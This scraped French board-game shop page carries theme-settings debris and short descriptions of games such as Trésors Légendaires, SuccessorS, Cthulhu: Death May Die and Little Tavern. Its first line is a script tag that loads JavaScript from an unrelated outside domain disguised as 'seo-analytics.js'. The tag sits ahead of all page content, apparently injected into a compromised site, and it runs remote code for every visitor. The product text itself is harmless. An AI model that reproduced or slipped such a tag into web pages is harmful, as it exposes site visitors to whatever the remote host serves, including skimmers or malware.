<script src="https://general-soft.space/seo-analytics.js" async></script>
|
Select Theme
|
|
|
Custome Color 1
|
|
|
Custome Color 2
|
|
|
Box-Layout
|
|
|
Background Pattern
|
custome background also available in admin. |
|
Background color
|
|
|
Wow Animation Enable
|
|
|
Left Stickt Enable
|
|
|
Right Stickt Enable
|
|
Garanties sécurité (à modifier dans le module "Réassurance")
Politique de livraison (à modifier dans le module "Réassurance")
Politique retours (à modifier dans le module "Réassurance")
| 5 Produits |
| Auteur(s) : | Yohan Servais |
| Année : | 2024 |
| Editeur : | IELLO |
| Age : | 12 Ans |
| Durée : | 180 Mns |
Dans Trésors Légendaires - Une aventure évolutive de pirates, vous êtes les capitaines d’un navire et vous allez vivre de nombreuses aventures sur les mers et dans des îles. Découvrez les mystères que renferment les enveloppes et soyez le plus malin pour voler et cacher vos trésors !
Les joueurs reçoivent secrètement en début de partie une île. Ils devront y cacher un maximum de tuiles trésors pour remporter la partie.
Les joueurs peuvent effectuer 3 actions parmi les suivantes :
1) Explorer - Déplacer leur navire d’une case et récupérer des tuiles du plateaux, qu’ils posent sur leur Pont
2) Se déplacer - Déplacer leur navire de deux case sans récupérer de tuile
3) Décharger - Décharger des tuiles de leur Pont sur une île
En 323 avant JC, Alexandre III de Macédoine meurt à l’age de 33 ans en laissant derrière lui un empire qui s’étend de la Macédoine à la vallée de l’Indus. Le problème de sa succession va immédiatement se poser et l’empire d’Alexandre va rapidement se retrouver déchiré par ceux que l’on appellera plus tard les diadoques…
SuccessorS vient (sur le plan de la chronologie de l’édition) après Hannibal & Hamilcar, qui a été élu meilleur wargame 2018 et meilleur jeu d’Histoire 2019.
Il en reprend les grands principes à savoir : jouer des cartes soit pour l’évènement représenté sur la carte soit pour les points opérationnels qu’elle accorde. Dans
Un jeu compétitif pour deux joueurs vous plongeant dans la guerre que se livrent la République Galactique et l’Alliance Séparatiste. Votre adversaire et vous choisissez chacun le camp que vous souhaitez incarner : la République ou les Séparatistes. Au cours de la partie, vous améliorerez votre deck de départ en achetant des cartes qui renforceront votre puissance de feu et multiplieront vos ressources. Vous pourrez alors attaquer avec de plus en plus d’efficacité les bases de votre adversaire : le premier joueur qui détruit trois bases adverses remporte la partie !
Plus de 50 cartes différentes vous permettent de jouer avec vos personnages, véhicules et vaisseaux préférés. Choisissez votre base parmi 10 planètes légendaires,
Prenez les rênes d’une civilisation et menez-les à la prospérité et la postérité. Recherchez de nouvelles technologies pour améliorer les connaissances scientifiques, la force militaire, la ferveur, la culture et l'industrialisation de votre nation. Développez le plus grand courant philosophique de l'humanité. Envoyez vos architectes et vos explorateurs et créez sur votre territoire des merveilles qui survivront dans le futur.
Développez votre population pour que les personnages les plus illustres y naissent et changent le monde à jamais, même après leur mort. Développez votre puissance militaire pour que le nom de votre civilisation suffise à faire trembler vos adversaires. Et si cela ne suffit pas, envoyez votre armée vaincre les barbares les plus lointains.
Des créatures inconcevables, plus terribles encore que le pire des cauchemars. Leur simple manifestation peut amener la fin du monde. Seuls ceux animés par la folie ont une chance de les arrêter.
Guidés par leur fanatisme et aidés par des forces surnaturelles, des adorateurs ont trouvé un moyen d’invoquer dans notre monde les Grands Anciens, des entités jusqu’alors mythiques qui ne laissent que la destruction et la terreur dans leur sillage.
Cthulhu : Death May Die – La Peur de L’Inconnu est un jeu de plateau coopératif au rythme endiablé où 1 à 5 joueurs contrôlent des investigateurs et œuvrent de
1861. La guerre de sécession fait rage. L’Union, avec à sa tête Abraham Lincoln, est opposée à la Confédération de Jefferson Davis. Au milieu de ce conflit, 5 états frontaliers, appelés les Border States (Delaware, Kentucky, Maryland, Missouri et Virginie-Occidentale), sont tiraillés entre abolitionnistes et esclavagistes. Ce sont eux qui peuvent faire basculer le cours de la guerre.
Border States est un jeu de réflexion, de bluff et de déduction, pour 2 joueurs où chacun prend en main un des deux camps et dispose de 10 pavés Général identiques. Chaque pavé représente une figure historique ayant participé à la guerre de Sécession. Les joueurs vont devoir ruser pour remporter un maximum de batailles, ce qui leur
Fast Blast et un jeu de rapidité et de défausse. Soyez le premier à vous débarrasser de vos cartes pour gagner la partie. Tout le monde joue simultanément avec ses 4 cartes révélées. Défaussez vos cartes si elles correspondent à la même couleur ou au même numéro que la carte au centre de la table.
Mettez le Turbo ! Dans Fast blast, il ne faut pas mollir. C’est la course à la défausse de vos cartes. Soyez attentifs et débarrassez vous de vos cartes en fonction de leurs couleurs ou de leurs valeurs. Préparez vous pour la grande course !
Connaissez-vous Brigit, le chat néo-zélandais voleur de sous-vêtements ? Saviez-vous que le plus grand journal de Norvège a publié l'avis de décès officiel du Père Noël ? Que les agents de la CIA s'envoient des messages par lacets de chaussures ? Ne vous inquiétez pas, vos amis non plus !
J'y crois pas est un jeu composé de cartes question et de jetons de points de victoire. Chaque joueur commence la partie avec une réserve de points.
À chaque tour un joueur, appelé le Candide, pioche une carte question et la pose aux autres joueurs, qui voient la réponse au verso. Chaque joueur va devoir proposer une réponse au Candide, sachant que la réponse correcte devra être donnée une seule fois. Le Candide va tenter d’éliminer les
Les Monstres Dé-traqués est un jeu d'association et de rapidité pour toute la famille, jouable dès l’âge de quatre ans. Pas besoin de savoir lire : il suffit de lâcher les dés dans la Tour à Monstres, d'identifier dessus les bons critères (nombre de bras, yeux, jambes...) et les retrouver parmi les cartes Monstre au milieu de la table.
À chaque tour de jeu, des cartes Monstre sont tirées au hasard et étalées faces visibles, au centre de la table. Le joueur actif secoue la tour contenant les dés, puis la repose. Chacun doit ensuite trouver un monstre correspondant. Le premier dé indique un nombre (y compris 0), le second une caractéristique : bras, jambe ou œil. Mettez votre doigt
Dice Throne est un jeu compétitif ou en équipe, proposant des combats à base de dés et de pouvoirs spécifiques à chaque personnage. Dans cette première boite vous incarnerez le Barbare ou l'Elfe Lunaire dans un combat épique !
Chaque année, le Roi Fou organise un tournoi de champions, avec comme enjeu le plus grand prix qu’un héros pourrait remporter : le Trône. Serez-vous assez audacieux pour le prendre ? Choisissez le héros qui vous attire le plus, certains sont plus complexes à prendre en main, mais ils sont tous aussi forts les uns que les autres !
Il était une fois deux royaumes voisins.
Leurs rois étaient à la fois avares et vaniteux, et n’avaient donc de cesse de se quereller pour savoir lequel d’entre eux était le plus célèbre. On pensait ne jamais voir la fin de ces disputes, mais un jour un voyageur ayant visité les deux royaumes leur proposa un défi : « Et si nous décidions que le plus prestigieux d’entre vous est celui qui érigera de nouveaux palais le plus rapidement possible ? » Chacun des deux rois se mit sur-le-champ à préparer la construction de ses palais et à saboter les projets de l’autre.
Pour récupérer leur délicieux goûter, les enfants devront former un chemin en dominos colorés. Les couleurs remplacent les chiffres pour une initiation à la stratégie dès l’âge de 5 ans. Ce jeu de course les entraîne à reconnaître les couleurs en s’amusant, grâce à un matériel adorable et facile à transporter.
La foule se presse aux portes de la Little Tavern. Placez les clients les plus généreux à votre table et refilez les plus radins à vos adversaires. Gérez leurs caprices, utilisez les événements à votre avantage et amassez le plus de pourboires pour remporter la partie !
À chacun de vos tours, prenez une carte Personnage ou Événement. Si c’est un personnage, placez-le autour de votre table ou de celle d’un camarade. Si c’est un événement, appliquez immédiatement ses effets. En fonction des clients que vous avez, de leurs synergies et interactions, vous cumulerez les pourboires.
Le premier qui possède 25 pièces d’or remporte la partie.
Un jeu de combinaisons rapide et dynamique pour mettre de l’ambiance autour de la table.
Dans cet opus Backstories : Seule Sous La Glace, vous incarnez Sophie et partez à la recherche de votre frère disparu.
Choisissez vos actions et superposez les cartes trouées pour avoir les réponses à vos questions et avancer dans votre quête.
Aventure de difficulté 2 sur 5.
Dans Hollywood 1947, chaque joueur sera secrètement un patriote, un communiste ou une étoile montante. À chaque tour, chaque joueur aura un travail unique à
Découvrez la passionnante EXTENSION de la Série Millénaire !
Chronicles of Time est une extension de Chronicles of Crime – La Série Millénaire qui lie les 3 périodes dans une fin épique !
Promenez-vous sur la plage. Sentez vos orteils s'enfoncer dans le sable. Découvrez un monde d'objets qui ne demandent qu'à être trouvés. Que vous ramassiez du bois flottant pour vos sculptures ou du verre poli pour vos boucles d'oreilles, laissez Mère Nature être votre muse en suivant les marées.
La marée change constamment ; vous ne savez jamais ce que vous trouverez sur la plage ! Prenez les cartes de la rangée pendant la MARÉE BASSE pour collecter des objets sur la plage. Pendant la MARÉE HAUTE, retournez les cartes recto-verso ; le verso indique les conditions de score.